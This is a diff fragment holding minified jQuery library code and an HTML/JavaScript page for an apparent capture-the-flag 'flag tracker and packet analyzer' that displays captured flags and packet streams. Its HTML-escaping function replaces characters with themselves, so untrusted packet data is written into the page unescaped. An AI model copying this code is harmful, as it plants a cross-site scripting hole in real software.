b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var j=c(this),i=j.html();j.empty().append(function(){return a.call(this,e,i)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&& +this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,b,f))});if(typeof a!=="string")a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(u){return c.nodeName(u,"table")?u.getElementsByTagName("tbody")[0]|| +u.appendChild(u.ownerDocument.createElement("tbody")):u}var e,j,i=a[0],o=[],k;if(!c.support.checkClone&&arguments.length===3&&typeof i==="string"&&ua.test(i))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(i))return this.each(function(u){var z=c(this);a[0]=i.call(this,u,b?z.html():w);z.domManip(a,b,d)});if(this[0]){e=i&&i.parentNode;e=c.support.parentNode&&e&&e.nodeType===11&&e.childNodes.length===this.length?{fragment:e}:sa(a,this,o);k=e.fragment;if(j=k.childNodes.length=== +1?(k=k.firstChild):k.firstChild){b=b&&c.nodeName(j,"tr");for(var n=0,r=this.length;n<r;n++)d.call(b?f(this[n],j):this[n],n>0||e.cacheable||this.length>1?k.cloneNode(true):k)}o.length&&c.each(o,Qa)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);var e=this.length===1&&this[0].parentNode;if(e&&e.nodeType===11&&e.childNodes.length===1&&d.length===1){d[b](this[0]); +return this}else{e=0;for(var j=d.length;e<j;e++){var i=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),i);f=f.concat(i)}return this.pushStack(f,a,d.selector)}}});c.extend({clean:function(a,b,d,f){b=b||s;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||s;for(var e=[],j=0,i;(i=a[j])!=null;j++){if(typeof i==="number")i+="";if(i){if(typeof i==="string"&&!jb.test(i))i=b.createTextNode(i);else if(typeof i==="string"){i=i.replace(Ka,Ma);var o=(La.exec(i)||["", +""])[1].toLowerCase(),k=F[o]||F._default,n=k[0],r=b.createElement("div");for(r.innerHTML=k[1]+i+k[2];n--;)r=r.lastChild;if(!c.support.tbody){n=ib.test(i);o=o==="table"&&!n?r.firstChild&&r.firstChild.childNodes:k[1]==="<table>"&&!n?r.childNodes:[];for(k=o.length-1;k>=0;--k)c.nodeName(o[k],"tbody")&&!o[k].childNodes.length&&o[k].parentNode.removeChild(o[k])}!c.support.leadingWhitespace&&V.test(i)&&r.insertBefore(b.createTextNode(V.exec(i)[0]),r.firstChild);i=r.childNodes}if(i.nodeType)e.push(i);else e= +c.merge(e,i)}}if(d)for(j=0;e[j];j++)if(f&&c.nodeName(e[j],"script")&&(!e[j].type||e[j].type.toLowerCase()==="text/javascript"))f.push(e[j].parentNode?e[j].parentNode.removeChild(e[j]):e[j]);else{e[j].nodeType===1&&e.splice.apply(e,[j+1,0].concat(c.makeArray(e[j].getElementsByTagName("script"))));d.appendChild(e[j])}return e},cleanData:function(a){for(var b,d,f=c.cache,e=c.event.special,j=c.support.deleteExpando,i=0,o;(o=a[i])!=null;i++)if(d=o[c.expando]){b=f[d];if(b.events)for(var k in b.events)e[k]? +c.event.remove(o,k):Ca(o,k,b.handle);if(j)delete o[c.expando];else o.removeAttribute&&o.removeAttribute(c.expando);delete f[d]}}});var kb=/z-?index|font-?weight|opacity|zoom|line-?height/i,Na=/alpha\([^)]*\)/,Oa=/opacity=([^)]*)/,ha=/float/i,ia=/-([a-z])/ig,lb=/([A-Z])/g,mb=/^-?\d+(?:px)?$/i,nb=/^-?\d/,ob={position:"absolute",visibility:"hidden",display:"block"},pb=["Left","Right"],qb=["Top","Bottom"],rb=s.defaultView&&s.defaultView.getComputedStyle,Pa=c.support.cssFloat?"cssFloat":"styleFloat",ja= +function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===w)return c.curCSS(d,f);if(typeof e==="number"&&!kb.test(f))e+="px";c.style(d,f,e)})};c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return w;if((b==="width"||b==="height")&&parseFloat(d)<0)d=w;var f=a.style||a,e=d!==w;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter= +Na.test(a)?a.replace(Na,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Oa.exec(f.filter)[1])/100+"":""}if(ha.test(b))b=Pa;b=b.replace(ia,ja);if(e)f[b]=d;return f[b]},css:function(a,b,d,f){if(b==="width"||b==="height"){var e,j=b==="width"?pb:qb;function i(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(j,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a, +"border"+this+"Width",true))||0})}a.offsetWidth!==0?i():c.swap(a,ob,i);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&a.currentStyle){f=Oa.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ha.test(b))b=Pa;if(!d&&e&&e[b])f=e[b];else if(rb){if(ha.test(b))b="float";b=b.replace(lb,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f= +a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ia,ja);f=a.currentStyle[b]||a.currentStyle[d];if(!mb.test(f)&&nb.test(f)){b=e.left;var j=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=j}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b= +a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var sb=J(),tb=/<script(.|\s)*?\/script>/gi,ub=/select|textarea/i,vb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ka=/\?/,wb=/(\?|&)_=.*?(&|$)/,xb=/^(\w+:)?\/\/([^\/?#]+)/,yb=/%20/g,zb=c.fn.load;c.fn.extend({load:function(a,b,d){if(typeof a!== +"string")return zb.call(this,a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=c.param(b,c.ajaxSettings.traditional);f="POST"}var j=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(i,o){if(o==="success"||o==="notmodified")j.html(e?c("<div />").append(i.responseText.replace(tb,"")).find(e):i.responseText);d&&j.each(d,[i.responseText,o,i])}});return this}, +serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||ub.test(this.nodeName)||vb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "), +function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href, +global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:A.XMLHttpRequest&&(A.location.protocol!=="file:"||!A.ActiveXObject)?function(){return new A.XMLHttpRequest}:function(){try{return new A.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&& +e.success.call(k,o,i,x);e.global&&f("ajaxSuccess",[x,e])}function d(){e.complete&&e.complete.call(k,x,i);e.global&&f("ajaxComplete",[x,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),j,i,o,k=a&&a.context||e,n=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(n==="GET")N.test(e.url)||(e.url+=(ka.test(e.url)? +"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||N.test(e.url))){j=e.jsonpCallback||"jsonp"+sb++;if(e.data)e.data=(e.data+"").replace(N,"="+j+"$1");e.url=e.url.replace(N,"="+j+"$1");e.dataType="script";A[j]=A[j]||function(q){o=q;b();d();A[j]=w;try{delete A[j]}catch(p){}z&&z.removeChild(C)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache=== +false&&n==="GET"){var r=J(),u=e.url.replace(wb,"$1_="+r+"$2");e.url=u+(u===e.url?(ka.test(e.url)?"&":"?")+"_="+r:"")}if(e.data&&n==="GET")e.url+=(ka.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&c.event.trigger("ajaxStart");r=(r=xb.exec(e.url))&&(r[1]&&r[1]!==location.protocol||r[2]!==location.host);if(e.dataType==="script"&&n==="GET"&&r){var z=s.getElementsByTagName("head")[0]||s.documentElement,C=s.createElement("script");C.src=e.url;if(e.scriptCharset)C.charset=e.scriptCharset;if(!j){var B= +false;C.onload=C.onreadystatechange=function(){if(!B&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){B=true;b();d();C.onload=C.onreadystatechange=null;z&&C.parentNode&&z.removeChild(C)}}}z.insertBefore(C,z.firstChild);return w}var E=false,x=e.xhr();if(x){e.username?x.open(n,e.url,e.async,e.username,e.password):x.open(n,e.url,e.async);try{if(e.data||a&&a.contentType)x.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&x.setRequestHeader("If-Modified-Since", +c.lastModified[e.url]);c.etag[e.url]&&x.setRequestHeader("If-None-Match",c.etag[e.url])}r||x.setRequestHeader("X-Requested-With","XMLHttpRequest");x.setRequestHeader("Accept",e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(ga){}if(e.beforeSend&&e.beforeSend.call(k,x,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");x.abort();return false}e.global&&f("ajaxSend",[x,e]);var g=x.onreadystatechange=function(q){if(!x||x.readyState===0||q==="abort"){E|| +d();E=true;if(x)x.onreadystatechange=c.noop}else if(!E&&x&&(x.readyState===4||q==="timeout")){E=true;x.onreadystatechange=c.noop;i=q==="timeout"?"timeout":!c.httpSuccess(x)?"error":e.ifModified&&c.httpNotModified(x,e.url)?"notmodified":"success";var p;if(i==="success")try{o=c.httpData(x,e.dataType,e)}catch(v){i="parsererror";p=v}if(i==="success"||i==="notmodified")j||b();else c.handleError(e,x,i,p);d();q==="timeout"&&x.abort();if(e.async)x=null}};try{var h=x.abort;x.abort=function(){x&&h.call(x); +g("abort")}}catch(l){}e.async&&e.timeout>0&&setTimeout(function(){x&&!E&&g("timeout")},e.timeout);try{x.send(n==="POST"||n==="PUT"||n==="DELETE"?e.data:null)}catch(m){c.handleError(e,x,null,m);d()}e.async||g();return x}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status=== +1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b=== +"json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(i,o){if(c.isArray(o))c.each(o,function(k,n){b||/\[\]$/.test(i)?f(i,n):d(i+"["+(typeof n==="object"||c.isArray(n)?k:"")+"]",n)});else!b&&o!=null&&typeof o==="object"?c.each(o,function(k,n){d(i+"["+k+"]",n)}):f(i,o)}function f(i,o){o=c.isFunction(o)?o():o;e[e.length]=encodeURIComponent(i)+"="+encodeURIComponent(o)}var e=[];if(b===w)b=c.ajaxSettings.traditional; +if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var j in a)d(j,a[j]);return e.join("&").replace(yb,"+")}});var la={},Ab=/toggle|show|hide/,Bb=/^([+-]=)?([\d+-.]+)(.*)$/,W,va=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay"); +this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(la[d])f=la[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();la[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a], +"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)}, +animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var j=c.extend({},e),i,o=this.nodeType===1&&c(this).is(":hidden"),k=this;for(i in a){var n=i.replace(ia,ja);if(i!==n){a[n]=a[i];delete a[i];i=n}if(a[i]==="hide"&&o||a[i]==="show"&&!o)return j.complete.call(this);if((i==="height"||i==="width")&&this.style){j.display=c.css(this,"display");j.overflow=this.style.overflow}if(c.isArray(a[i])){(j.specialEasing= +j.specialEasing||{})[i]=a[i][1];a[i]=a[i][0]}}if(j.overflow!=null)this.style.overflow="hidden";j.curAnim=c.extend({},a);c.each(a,function(r,u){var z=new c.fx(k,j,r);if(Ab.test(u))z[u==="toggle"?o?"show":"hide":u](a);else{var C=Bb.exec(u),B=z.cur(true)||0;if(C){u=parseFloat(C[2]);var E=C[3]||"px";if(E!=="px"){k.style[r]=(u||1)+E;B=(u||1)/z.cur(true)*B;k.style[r]=B+E}if(C[1])u=(C[1]==="-="?-1:1)*u+B;z.custom(B,u,E)}else z.custom(B,u,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]); +this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration=== +"number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]|| +c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(j){return e.step(j)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start; +this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now= +this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem, +e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length|| +c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in s.documentElement? +function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b= +this[0];if(a)return this.each(function(r){c.offset.setOffset(this,a,r)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=b,e=b.ownerDocument,j,i=e.documentElement,o=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var k=b.offsetTop,n=b.offsetLeft;(b=b.parentNode)&&b!==o&&b!==i;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;j=e?e.getComputedStyle(b,null):b.currentStyle; +k-=b.scrollTop;n-=b.scrollLeft;if(b===d){k+=b.offsetTop;n+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&j.overflow!=="visible"){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=j}if(f.position==="relative"||f.position==="static"){k+=o.offsetTop;n+=o.offsetLeft}if(c.offset.supportsFixedPosition&& +f.position==="fixed"){k+=Math.max(i.scrollTop,o.scrollTop);n+=Math.max(i.scrollLeft,o.scrollLeft)}return{top:k,left:n}};c.offset={initialize:function(){var a=s.body,b=s.createElement("div"),d,f,e,j=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>"; +a.insertBefore(b,a.firstChild);d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==j;a.removeChild(b); +c.offset.initialize=c.noop},bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),j=parseInt(c.curCSS(a,"top",true),10)||0,i=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a, +d,e);d={top:b.top-e.top+j,left:b.left-e.left+i};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top- +f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||s.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],j;if(!e)return null;if(f!==w)return this.each(function(){if(j=wa(this))j.scrollTo(!a?f:c(j).scrollLeft(),a?f:c(j).scrollTop());else this[d]=f});else return(j=wa(e))?"pageXOffset"in j?j[a?"pageYOffset": +"pageXOffset"]:c.support.boxModel&&j.document.documentElement[d]||j.document.body[d]:e[d]}});c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in +e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); diff --git a/flag-tracker/facebox/loading.gif b/flag-tracker/facebox/loading.gif Binary files differ. diff --git a/flag-tracker/index.html b/flag-tracker/index.html @@ -0,0 +1,112 @@ +<!DOCTYPE HTML> +<html> + <head> + <title>Flag Tracker</title> + <link rel="stylesheet" href="screen.css" media="screen" type="text/css" /> + <link rel="stylesheet" href="facebox/facebox.css" media="screen" type="text/css" /> + + <script src="jquery-1.6.2.min.js" type="text/javascript"></script> + <script src="facebox/facebox.js"></script> + + <!--<script src="/rwthctf.js" type="text/javascript"></script> + <script src="/jquery-ui-1.8.16.custom.min.js" type="text/javascript"></script>--> + <script type="text/javascript"> + $.fn.htmlTo = function(elem) { + return this.each(function() { + $(elem).html($(this).html()); + }); + } + + function convertScapyToHTML(str) + { + str = str.replace(/&/g, "&"); + str = str.replace(/>/g, ">"); + str = str.replace(/</g, "<"); + str = str.replace(/"/g, """); + str = str.replace(/'/g, "'"); + str = str.replace(/#\[#/g, "<"); + str = str.replace(/#\]#/g, ">"); + str = str.replace(/\n/g, "<br/>"); + return str; + } + + var loaded_items = [] + + function updateFlags() + { + $.getJSON('/get/flags', function(data) { + var items = []; + + data.reverse() + + $.each(data, function(key, val) { + s = '<tr id="flags" class="'+ val[3] +'"><td>'+ val[0] +'</td><td class="direction">'+ val[3].toUpperCase() +'</td><td class="flag"><a href="#/get/'+ val[4] +'/'+ val[1] +'">'+ val[2] +'</a></td><td class="info">'+ convertScapyToHTML(val[5]) +'</td></tr>'; + + if($.inArray(s, loaded_items) == -1) { + loaded_items.unshift(s); + } + + $('<table/>', { + 'class': 'flag-list', + html: loaded_items.join('') + }).htmlTo('div#flags'); + + + $("a[href*='#/get/']").click(function() { + $.getJSON(this.href.split('#')[1], function(data) { + var items = []; + + $.each(data['packets'], function(key, val) { + items.push('<li id="packet">'+convertScapyToHTML(val)+'</li>'); + }); + + $('<ul/>', { + 'class': 'packet-list', + html: items.join('') + }).htmlTo('div#packets'); + + if(data['payload'] == null) { + $('div#packets').css('display', 'inline'); + } + + p = document.getElementById('payload'); + p.innerHTML = '<h2>Stream content:</h1>'+convertScapyToHTML(data['payload']); + + if(data['payload'] != null) { + $('div#payload').css('display', 'inline'); + } else { + $('div#payload').css('display', ' none'); + } + }); + }); + }); + }); + } + + $(document).ready(function() { + // do stuff when DOM is ready + + document.getElementById('flags').innerHTML = '' + updateFlags(); + //setInterval('updateFlags()', 5*1000); + }); + </script> + </head> + <body> + <div id="header"> + <h1>Realtime Flag Tracker and Packet Analyzer</h1> + </div> + + <div id="flags"> + <div>This page requires JavaScript to be enabled for insane fancyness.</div> + </div> + + <div id="packets", style="display: none;"> + No flag selected. + </div> + + <div id="payload", style="display: none;"> + No flag selected. + </div> + </body> +</html> diff --git a/flag-tracker/index.html~ b/flag-tracker/index.html~ @@ -0,0 +1,112 @@ +<!DOCTYPE HTML> +<html> + <head> + <title>Flag Tracker</title> + <link rel="stylesheet" href="/screen.css" media="screen" type="text/css" /> + <link rel="stylesheet" href="/facebox/facebox.css" media="screen" type="text/css" /> + + <script src="/jquery-1.6.2.min.js" type="text/javascript"></script> + <script src="/facebox/facebox.js"></script> + + <!--<script src="/rwthctf.js" type="text/javascript"></script> + <script src="/jquery-ui-1.8.16.custom.min.js" type="text/javascript"></script>--> + <script type="text/javascript"> + $.fn.htmlTo = function(elem) { + return this.each(function() { + $(elem).html($(this).html()); + }); + } + + function convertScapyToHTML(str) + { + str = str.replace(/&/g, "&"); + str = str.replace(/>/g, ">"); + str = str.replace(/</g, "<"); + str = str.replace(/"/g, """); + str = str.replace(/'/g, "'"); + str = str.replace(/#\[#/g, "<"); + str = str.replace(/#\]#/g, ">"); + str = str.replace(/\n/g, "<br/>"); + return str; + } + + var loaded_items = [] + + function updateFlags() + { + $.getJSON('/get/flags', function(data) { + var items = []; + + data.reverse() + + 